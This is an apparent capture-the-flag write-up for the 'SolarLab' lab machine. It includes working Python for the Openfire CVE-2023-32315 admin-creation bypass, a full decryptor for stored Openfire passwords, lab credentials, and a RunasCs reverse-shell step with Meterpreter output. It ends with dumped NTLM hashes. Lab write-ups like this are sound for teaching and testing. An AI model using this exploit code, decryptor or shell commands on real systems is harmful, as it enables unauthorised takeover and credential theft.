    tcp    127.0.0.1:49701    127.0.0.1:49702   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49702    127.0.0.1:49701   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49703    127.0.0.1:49704   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49704    127.0.0.1:49703   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49705    127.0.0.1:49706   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49706    127.0.0.1:49705   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49707    127.0.0.1:49708   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49708    127.0.0.1:49707   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49709    127.0.0.1:49710   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49710    127.0.0.1:49709   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49711    127.0.0.1:49712   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49712    127.0.0.1:49711   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49713    127.0.0.1:49714   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49714    127.0.0.1:49713   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49715    127.0.0.1:49716   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49716    127.0.0.1:49715   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:59118    127.0.0.1:59119   ESTABLISHED  0     0      5068/python3.11.exe
    tcp    127.0.0.1:59119    127.0.0.1:59118   ESTABLISHED  0     0      5068/python3.11.exe
    tcp    127.0.0.1:59130    127.0.0.1:5000    FIN_WAIT2    0     0      5736/nginx.exe
    tcp    127.0.0.1:59133    127.0.0.1:9090    TIME_WAIT    0     0      0/[System Process]
    tcp    127.0.0.1:59134    127.0.0.1:9090    TIME_WAIT    0     0      0/[System Process]
    tcp6   :::135             :::*              LISTEN       0     0      904/svchost.exe
    tcp6   :::445             :::*              LISTEN       0     0      4/System
    tcp6   :::5985            :::*              LISTEN       0     0      4/System
    tcp6   :::47001           :::*              LISTEN       0     0      4/System
    tcp6   :::49664           :::*              LISTEN       0     0      664/lsass.exe
    tcp6   :::49665           :::*              LISTEN       0     0      532/wininit.exe
    tcp6   :::49666           :::*              LISTEN       0     0      628/svchost.exe
    tcp6   :::49667           :::*              LISTEN       0     0      1608/svchost.exe
    tcp6   :::49668           :::*              LISTEN       0     0      656/services.exe
    udp    0.0.0.0:123        0.0.0.0:*                      0     0      5952/svchost.exe
    udp    0.0.0.0:500        0.0.0.0:*                      0     0      2568/svchost.exe
    udp    0.0.0.0:4500       0.0.0.0:*                      0     0      2568/svchost.exe
    udp    0.0.0.0:5050       0.0.0.0:*                      0     0      1336/svchost.exe
    udp    0.0.0.0:5353       0.0.0.0:*                      0     0      1936/svchost.exe
    udp    0.0.0.0:5355       0.0.0.0:*                      0     0      1936/svchost.exe
    udp    10.10.11.16:137    0.0.0.0:*                      0     0      4/System
    udp    10.10.11.16:138    0.0.0.0:*                      0     0      4/System
    udp    10.10.11.16:1900   0.0.0.0:*                      0     0      5016/svchost.exe
    udp    10.10.11.16:62302  0.0.0.0:*                      0     0      5016/svchost.exe
    udp    127.0.0.1:1900     0.0.0.0:*                      0     0      5016/svchost.exe
    udp    127.0.0.1:57769    0.0.0.0:*                      0     0      2980/svchost.exe
    udp    127.0.0.1:62303    0.0.0.0:*                      0     0      5016/svchost.exe
    udp6   :::123             :::*                           0     0      5952/svchost.exe
    udp6   :::500             :::*                           0     0      2568/svchost.exe
    udp6   :::4500            :::*                           0     0      2568/svchost.exe
    udp6   ::1:1900           :::*                           0     0      5016/svchost.exe
    udp6   ::1:62301          :::*                           0     0      5016/svchost.exe

An Openfire service turned up here; the Jab box ran the same service.

CVE-2023-32315

https://github.com/miko550/CVE-2023-32315

Once inside the Openfire admin console you can upload a malicious plugin jar and get a shell.

Openfire 3.10.0 through 4.6.7 and 4.7.0 through 4.7.4 (fixed in 4.6.8 / 4.7.5) have an authentication bypass in the admin console: a path traversal through the unauthenticated /setup/ pages reaches any console JSP, so an unauthenticated attacker can simply create a new admin user.


Then upload the shell jar from the GitHub repo as a plugin.

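The two requests behind the user-creation step, as an added example that is not code from this post or from the linked PoC repository. It uses only the standard library, and it uses http.client on purpose: that client sends the request path byte-for-byte, whereas URL-normalising clients re-encode "%u002e" as "%25u002e" and the bypass silently stops working. The host, port, username and password are made-up placeholders; the traversal prefix, the JSP parameter names and the "csrf" cookie are the ones the public PoC relies on.

```python
# Added example, not code from the original post or the linked PoC repository.
# Reproduces the two requests behind CVE-2023-32315 with the standard library only.
# Assumptions: host/port/username/password are made up; the traversal prefix, the
# JSP parameter names and the "csrf" cookie are those used by the public PoC.
import http.client
from urllib.parse import urlencode

# The admin console's auth filter exempts anything under /setup/. The embedded Jetty
# then decodes the non-standard %uXXXX escapes, so this prefix collapses to "/" and
# any console JSP is reached without a session.
TRAVERSAL = "/setup/setup-s/%u002e%u002e/%u002e%u002e/"


def parse_cookies(set_cookie_headers):
    """name -> value for a list of Set-Cookie header values (attributes dropped)."""
    jar = {}
    for header in set_cookie_headers:
        name, _, value = header.split(";", 1)[0].partition("=")
        jar[name.strip()] = value.strip()
    return jar


def login_path():
    """First hop: any page through the traversal makes the console issue cookies."""
    return TRAVERSAL + "login.jsp"


def create_user_path(csrf, username, password, is_admin=True):
    """Second hop: user-create.jsp with the csrf token the console handed out.
    isadmin=on is the 'Administrator' checkbox on that form."""
    params = {
        "csrf": csrf,
        "username": username,
        "name": "",
        "email": "",
        "password": password,
        "passwordConfirm": password,
        "create": "Create User",
    }
    if is_admin:
        params["isadmin"] = "on"
    return TRAVERSAL + "user-create.jsp?" + urlencode(params)


def add_admin(host, port, username, password):
    """Run both hops against a live console; returns (HTTP status, cookie jar)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", login_path())
    resp = conn.getresponse()
    resp.read()
    jar = parse_cookies(resp.headers.get_all("Set-Cookie") or [])
    if "csrf" not in jar:
        raise RuntimeError("no csrf cookie issued: target is probably patched")
    cookie = "; ".join(f"{k}={v}" for k, v in jar.items())
    conn.request("GET", create_user_path(jar["csrf"], username, password),
                 headers={"Cookie": cookie})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status, jar


if __name__ == "__main__":
    # Made-up credentials. 9090 is the console's default plain-HTTP port; on this box
    # it only listens on loopback, so point this at the chisel SOCKS pivot or a forward.
    status, _ = add_admin("127.0.0.1", 9090, "svc_backup", "Pr0xyP4ss!")
    print("user-create.jsp returned HTTP", status)
```

A 200 from user-create.jsp does not by itself prove success; log in to the console with the new account (or check OFUSER in the embedded database) before moving on to the plugin upload.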

PS C:\Program Files\Openfire\bin> type  .\extra\embedded-db-viewer.bat
type  .\extra\embedded-db-viewer.bat
@echo off

REM # Script to start the HSQLDB database viewer. The embedded-db.rc file
REM # contains connection settings. Visit http://hsqldb.org for documentation
REM # on using the tool. The classpath includes JDBC drivers shipped with Openfire
REM # to work with the Transfer tool. You will need to add any other JDBC driver
REM # that you'd like to use with the transfer tool to the classpath manually.

SET CLASSPATH=%~dp0..\..\lib\*

echo Starting embedded database viewer...

java -cp %CLASSPATH% org.hsqldb.util.DatabaseManagerSwing --rcfile embedded-db.rc --urlid embedded-db
PS C:\Program Files\Openfire\bin> type .\extra\embedded-db.rc
type .\extra\embedded-db.rc
# Connection settings for the embedded Openfire database.
urlid embedded-db
url jdbc:hsqldb:../../embedded-db/openfire
username sa
password
PS C:\Program Files\Openfire\bin>       

    Directory: C:\Program Files\Openfire

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023   2:11 PM                .install4j
d-----         5/17/2024  10:37 AM                bin
d-----         5/17/2024   8:59 AM                conf
d-----        11/17/2023   2:11 PM                documentation
d-----         5/17/2024  10:27 AM                embedded-db
d-----        11/17/2023   2:11 PM                lib
d-----        11/17/2023   2:24 PM                logs
d-----         5/17/2024  10:34 AM                plugins
d-----        11/17/2023   2:11 PM                resources
-a----         11/9/2022   5:59 PM         375002 changelog.html
-a----         2/16/2022   5:55 PM          10874 LICENSE.html
-a----         2/16/2022   5:55 PM           5403 README.html
-a----         11/9/2022   6:00 PM         798720 uninstall.exe

PS C:\Program Files\Openfire> ls embedded-db
ls embedded-db

    Directory: C:\Program Files\Openfire\embedded-db

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/17/2024   8:59 AM                openfire.tmp
-a----         5/17/2024   8:59 AM              0 openfire.lck
-a----         5/17/2024  10:35 AM           6667 openfire.log
-a----         5/17/2024   8:59 AM            106 openfire.properties
-a----          5/7/2024   9:15 PM          16161 openfire.script
-a----         5/17/2024  10:27 AM              0 RunasCs.exe

openfire.script is a SQL script: the embedded HSQLDB persists its whole state as plain CREATE and INSERT statements, so the user table and the server properties are readable as text by anyone who can read the Openfire install directory.


The column layout is as follows:

➜  openfire cat openfire.script|grep -i ofuser
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
CREATE INDEX OFUSER_CDATE_IDX ON PUBLIC.OFUSER(CREATIONDATE)
CREATE MEMORY TABLE PUBLIC.OFUSERPROP(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFUSERPROP_PK PRIMARY KEY(USERNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFUSERFLAG(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,STARTTIME VARCHAR(15),ENDTIME VARCHAR(15),CONSTRAINT OFUSERFLAG_PK PRIMARY KEY(USERNAME,NAME))
CREATE INDEX OFUSERFLAG_STIME_IDX ON PUBLIC.OFUSERFLAG(STARTTIME)
CREATE INDEX OFUSERFLAG_ETIME_IDX ON PUBLIC.OFUSERFLAG(ENDTIME)
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFUSERPROP VALUES('admin','console.rows_per_page','/session-summary.jsp=25')
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')

Those are the inserted values; the OFPROPERTY table holds the key they were encrypted with:

➜  openfire cat openfire.script|grep -i prop
CREATE MEMORY TABLE PUBLIC.OFUSERPROP(USERNAME VARCHAR(64) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFUSERPROP_PK PRIMARY KEY(USERNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFGROUPPROP(GROUPNAME VARCHAR(50) NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFGROUPPROP_PK PRIMARY KEY(GROUPNAME,NAME))
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,ENCRYPTED INTEGER,IV CHARACTER(24),CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME))
CREATE MEMORY TABLE PUBLIC.OFMUCSERVICEPROP(SERVICEID BIGINT NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFMUCSERVICEPROP_PK PRIMARY KEY(SERVICEID,NAME))
CREATE MEMORY TABLE PUBLIC.OFMUCROOMPROP(ROOMID BIGINT NOT NULL,NAME VARCHAR(100) NOT NULL,PROPVALUE VARCHAR(4000) NOT NULL,CONSTRAINT OFMUCROOMPROP_PK PRIMARY KEY(ROOMID,NAME))
INSERT INTO OFUSERPROP VALUES('admin','console.rows_per_page','/session-summary.jsp=25')
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''RoomStatistics.maxLifetime','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''RoomStatistics.size','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''Rooms.maxLifetime','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('cache.MUCService''conference''Rooms.size','-1',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.auth.className','org.jivesoftware.openfire.auth.DefaultAuthProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.group.className','org.jivesoftware.openfire.group.DefaultGroupProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.lockout.className','org.jivesoftware.openfire.lockout.DefaultLockOutProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.securityAudit.className','org.jivesoftware.openfire.security.DefaultSecurityAuditProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.user.className','org.jivesoftware.openfire.user.DefaultUserProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.vcard.className','org.jivesoftware.openfire.vcard.DefaultVCardProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('update.lastCheck','1715023572956',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.auth.anonymous','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.domain','solarlab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.proxy.enabled','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.socket.ssl.active','true',0,NULL)
passwordKey = hGXiFzsKaAeYLjn

encryptedPassword = becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442

openfire_decrypt

Reference: https://github.com/jas502n/OpenFire_Decrypt


➜  target git:(main) ls
OpenFire-1.0-SNAPSHOT-jar-with-dependencies.jar  OpenFire-1.0-SNAPSHOT.jar
➜  target git:(main) java -jar OpenFire-1.0-SNAPSHOT-jar-with-dependencies.jar
__________________________________________
OpenFire admin console account/password decryption
encryptedPassword =>> the console user's password (ciphertext)
passwordKey =>> the key generated at install time

[+] encryptedPassword= becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442
[+] passwordKey= hGXiFzsKaAeYLjn
[+] Password =>> ThisPasswordShouldDo!@

That recovers the admin password. Note that passwordKey sits in OFPROPERTY, in the same database as the ciphertext, so anyone who can read openfire.script can recover every value in ENCRYPTEDPASSWORD: this is reversible obfuscation, not a password hash.
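To show exactly what the decrypt tool is undoing, here is an added example (not code from this post or from the OpenFire_Decrypt tool) that re-implements Openfire's scheme with no third-party crypto library: the stored value is hex(IV || Blowfish-CBC(key = SHA-1(passwordKey), data = UTF-16BE(password) padded to 8 bytes)). The Blowfish tables are derived from pi as the cipher defines, so the whole thing is auditable in one file. The defaults at the bottom are the passwordKey and ciphertext read from openfire.script above; the parse helper is my addition and assumes the INSERT layout shown in the grep output.

```python
# Added example, not code from the post or from the OpenFire_Decrypt tool. It
# re-implements what Openfire's org.jivesoftware.util.Blowfish does to produce
# ENCRYPTEDPASSWORD, with no third-party crypto library:
#   hex( IV[8 bytes] || Blowfish-CBC( key = SHA-1(passwordKey),
#                                     data = UTF-16BE(password) padded to 8 bytes ) )
# Defaults below are the passwordKey and ciphertext read from openfire.script.
import hashlib
import re
import struct

_TABLE_WORDS = 18 + 4 * 256  # P-array plus four 256-entry S-boxes, all taken from pi

def _pi_fraction_words(n_words):
    """First n_words 32-bit words of pi's hex fraction (Machin's formula)."""
    bits = 32 * n_words + 64          # 64 guard bits absorb series truncation error
    one = 1 << bits

    def atan_inv(x):                  # atan(1/x) in fixed point
        total = term = one // x
        x2, k, sign = x * x, 3, -1
        while term:
            term //= x2
            total += sign * (term // k)
            k, sign = k + 2, -sign
        return total

    frac = (16 * atan_inv(5) - 4 * atan_inv(239) - 3 * one) >> 64
    return list(struct.unpack(">%dI" % n_words, frac.to_bytes(4 * n_words, "big")))

class Blowfish:
    def __init__(self, key):          # key: 4..56 bytes; Openfire passes SHA-1 (20)
        words = _pi_fraction_words(_TABLE_WORDS)
        self.P = words[:18]
        self.S = [words[18 + 256 * i:18 + 256 * (i + 1)] for i in range(4)]
        j = 0
        for i in range(18):           # XOR the cycled key bytes into P
            word = 0
            for _ in range(4):
                word = (word << 8) | key[j]
                j = (j + 1) % len(key)
            self.P[i] ^= word
        l = r = 0                     # then replace P and S with the cipher's own output
        for i in range(0, 18, 2):
            l, r = self.encrypt_block(l, r)
            self.P[i], self.P[i + 1] = l, r
        for box in self.S:
            for i in range(0, 256, 2):
                l, r = self.encrypt_block(l, r)
                box[i], box[i + 1] = l, r

    def _f(self, x):
        s = self.S
        h = (s[0][x >> 24] + s[1][(x >> 16) & 0xFF]) & 0xFFFFFFFF
        return ((h ^ s[2][(x >> 8) & 0xFF]) + s[3][x & 0xFF]) & 0xFFFFFFFF

    def encrypt_block(self, l, r):
        for i in range(16):
            l ^= self.P[i]
            r ^= self._f(l)
            l, r = r, l
        return r ^ self.P[17], l ^ self.P[16]

    def decrypt_block(self, l, r):
        for i in range(17, 1, -1):
            l ^= self.P[i]
            r ^= self._f(l)
            l, r = r, l
        return r ^ self.P[0], l ^ self.P[1]

def openfire_decrypt(password_key, encrypted_hex):
    """Invert Openfire's Blowfish.encryptString(): hex IV prefix, CBC, pad, UTF-16BE."""
    blob = bytes.fromhex(encrypted_hex)
    if len(blob) < 16 or len(blob) % 8:
        raise ValueError("expected an 8-byte IV followed by whole 8-byte blocks")
    bf = Blowfish(hashlib.sha1(password_key.encode()).digest())
    prev, out = blob[:8], bytearray()
    for off in range(8, len(blob), 8):
        block = blob[off:off + 8]
        l, r = bf.decrypt_block(*struct.unpack(">II", block))
        out += bytes(a ^ b for a, b in zip(struct.pack(">II", l, r), prev))
        prev = block
    pad = out[-1] if out[-1] <= 8 else 0   # Openfire ignores an out-of-range pad byte
    return bytes(out[:len(out) - pad]).decode("utf-16-be")

def parse_openfire_script(text):
    """passwordKey and {username: ENCRYPTEDPASSWORD} straight out of openfire.script."""
    v = r"(?:NULL|'[^']*')"
    key = re.search(r"OFPROPERTY VALUES\('passwordKey','([^']*)'", text)
    rows = re.findall(r"OFUSER VALUES\('([^']*)',%s,%s,%s,\d+,%s,'([0-9a-fA-F]+)'" % (v, v, v, v), text)
    return (key.group(1) if key else None), dict(rows)

if __name__ == "__main__":
    print(openfire_decrypt("hGXiFzsKaAeYLjn",
                           "becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a1"
                           "1a94016d57ac62d4e89b2856b0289b365f3069802e59d442"))
```

Feed the whole openfire.script to parse_openfire_script and loop openfire_decrypt over the returned users to recover every console account at once; the ciphertext length also tells you the password length up front (56 bytes here is 8 bytes of IV plus 48 of UTF-16BE text and padding, i.e. a 21- to 24-character password).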

RunasCs

The Openfire admin password is reused for the local Administrator account, so RunasCs can launch the reverse-shell binary as Administrator:

\Openfire\bin> .\RunasCs.exe administrator 'ThisPasswordShouldDo!@' "cmd /c C:/users/public/shell.exe" --bypass-uac
.\RunasCs.exe administrator 'ThisPasswordShouldDo!@' "cmd /c C:/users/public/documents/shell.exe" --bypass-uac

[*] Sending stage (200774 bytes) to 10.10.11.16
[*] Meterpreter session 3 opened (10.10.16.10:4444 -> 10.10.11.16:60198) at 2024-05-17 16:29:27 +0800
                                                                                                          


Hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::
blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
meterpreter >

In summary

User :

SMB enum → detail-file.xlsx (password backup file) → brute-force the login on port 6791 → blaked → ReportLab html-to-PDF RCE (CVE-2023-33733)

Root:

Openfire → chisel SOCKS pivot → CVE-2023-32315 add a new admin user → upload a plugin jar → RCE → decrypt the Openfire administrator password

User

https://github.com/c53elyas/CVE-2023-33733

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

Root

https://github.com/miko550/CVE-2023-32315

https://github.com/jas502n/OpenFire_Decrypt
